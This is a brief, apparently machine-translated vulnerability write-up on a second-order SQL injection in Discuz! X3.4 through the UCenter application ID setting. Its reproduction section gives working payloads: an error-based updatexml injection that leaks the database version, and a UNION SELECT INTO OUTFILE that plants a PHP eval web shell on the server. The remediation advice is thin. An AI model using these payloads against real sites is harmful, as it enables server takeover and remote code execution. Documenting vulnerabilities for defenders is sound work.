0x01 Vulnerability Description
Discuz! X full version of SQL injection vulnerability. Causes vulnerability results source \ admincp \ admincp_setting.php processing $ settingnew [ 'uc'] is not completely filtered parameter [ 'appid'], lead to secondary injection. Under certain conditions, an attacker could exploit this vulnerability to gain server access.
0x02 scope
Discuz! X series full version, as of Discuz! X latest Discuz! X3.4 R20191201 version
0x03 vulnerability details
(1) \ source \ admincp \ admincp_setting.php first line 2571, a user controllable parameter $ settingnew [ 'uc'] [ 'appid'] replaced. \ Config \ UC_APPID of config_ucenter.php constant value profile, and the configuration file
(2) \ uc_client \ model \ base.php line 206, UC_APPID spliced directly into the SQL statement
(3) When you call a function that will trigger the secondary injection
0x04 reproducible vulnerability
(1) the application ID input at the Master -UCenter arrangement 1 '
(2) Home access will generate SQL error triggers
(3) it is possible to insert additional payload test
1' and (updatexml(1,concat(0x7e,(select version()),0x7e),1));-- a
(4) Write a horse
1' union select '<?php @eval($_POST[1]);?>' into outfile 'C:/phpStudy/PHPTutorial/WWW/shell.php';-- a
0x05修复建议
(1)后台不使用弱口令
(2)官方暂未发布补丁,关注官方补丁信息